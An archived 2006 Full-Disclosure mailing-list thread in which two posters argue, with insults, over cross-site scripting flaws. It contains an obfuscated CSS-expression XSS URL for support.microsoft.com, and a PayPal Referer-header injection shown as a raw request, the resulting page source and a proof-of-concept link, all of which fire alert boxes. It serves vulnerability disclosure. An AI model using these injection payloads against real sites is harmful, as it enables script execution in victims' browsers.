Re: [Full-disclosure] Re: micosoft.com xss

---

• From: "Mad World" <penetrator@xxxxxxxxxx>
• Date: Tue, 8 Aug 2006 10:47:36 -0700

---

For such a words you could eat your hat if I would like to go in public.
It's a last time i am teaching script kiddies for something beond their understanding.
I would like that you have at least small area in your brains that restricts your tong.
If you wouldn't be script kiddie you would take your words back and learn instead.
Yesterdays code is here:

http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us%27%29%22%20st%79le%3d%22co%6cor%3aex%70ress%69on%28ale%72t%28String.fromCharCode%280x004d%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x0063%29%2bString.fromCharCode%280x0072%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x002c%29%2bString.fromCharCode%280x0073%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0066%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x003a%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x006d%29%2bString.fromCharCode%280x0070%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0065%29%2bString.fromCharCode%280x006e%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0021%29%29%29%22%20a%3d%22%5c%22%29

Learn,learn,learn (of course if you will have enaugh skills to handle your browser after that).

Greets,
Mad World.

--- thomas.pollet@xxxxxxxxx wrote:

Man you suck, codes or stfu.

I know the code is broken in more than 1 place, i tried registering event handlers, exiting jscript etc. etc. time to move on....

point is xss is everywhere, trust noone etc. etc.

To make my point clear... last of the xss@xxxxxxxxx

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");var%20f="



results in

....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison ";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling= "20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>

in other words.... referer url isn't correctly cleaned for paypal registration page and used for js var.
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");s.r="

and click on the sign up link

Have a nice life, die soon,
Thomas


On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:
Good morning !

You can doubt, it's your right to do so.
Wanna bet ?
Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place ..
I's relatively easy using the same exact place of code you tried to make it.
I have working example, it is based on other microsoft "features" as well.

Greets,
- Mad World

--- thomas.pollet@xxxxxxxxx wrote:

From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
To: penetrator@xxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200

On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:

Why do you need it ?
You already discovered xss, the rest of "job" is just matter
of technique.
I think majority of xss submitters here could do it by
various means.
M$ is lost in its own complexity of how to do simple things.
If you could ever give me reasonable answer for why do you
need this $hit - I could give you the "rest", like others
could.

I doubt you actually tried getting js executed on page load
(for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.
Greets,
Thomas



_____________________________________________________________
Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com .... FAST!
128k dialup: login.samuinet.com


--- thomas.pollet@xxxxxxxxx wrote:

From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
To: penetrator@xxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200

On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:

Why do you need it ?
You already discovered xss, the rest of "job" is just matter
of technique.
I think majority of xss submitters here could do it by
various means.
M$ is lost in its own complexity of how to do simple things.
If you could ever give me reasonable answer for why do you
need this $hit - I could give you the "rest", like others
could.

I doubt you actually tried getting js executed on page load
(for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.
Greets,
Thomas



_____________________________________________________________
Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com .... FAST!
128k dialup: login.samuinet.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

---

• Follow-Ups:
  • Re: [Full-disclosure] Re: micosoft.com xss
    • From: Thomas Pollet

• Prev by Date: [Full-disclosure] FCE Ultra buffer overflow, yet another local exploit without any fancy stuff.
• Next by Date: [Full-disclosure] TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities
• Previous by thread: Re: [Full-disclosure] Re: micosoft.com xss
• Next by thread: Re: [Full-disclosure] Re: micosoft.com xss
• Index(es):
  • Date
  • Thread

---

Relevant Pages [Full-disclosure] paypal.com xss (was Re: micosoft.com xss) ... I know the code is broken in more than 1 place, i tried registering event ... point is xss is everywhere, ... (for some reason they try to prevent xss in a number of ways). ... Full-Disclosure - We believe in it. ... (Full-Disclosure) Re: [Full-disclosure] Re: micosoft.com xss ... Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place .. ... You already discovered xss, the rest of "job" is just matter ... (for some reason they try to prevent xss in a number of ways). ... Full-Disclosure - We believe in it. ... (Full-Disclosure) Re: Evolution of Cross-Site Scripting Attacks ... I have already detected on my logs a tool which scan for XSS, ... per second obviously imposible for "active human explotation", ... this incident to the incidents mailing list the 16th but for some reason ... Best Regards ... (Vuln-Dev) Re: [Full-disclosure] Re: micosoft.com xss ... You already discovered xss, the rest of "job" is just matter of technique. ... I think majority of xss submitters here could do it by various means. ... I doubt you actually tried getting js executed on page load (for some reason ... (Full-Disclosure) Re: [Full-disclosure] Arin.net XSS ... It works in IE just fine and probably some other browsers. ... This prevents the script from being interpreted properly via the Address bar. ... Subject: [Full-disclosure] Arin.net XSS ... I think that XSS in many instances is a serious issues. ... (Full-Disclosure)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > Full-Disclosure  > 2006-08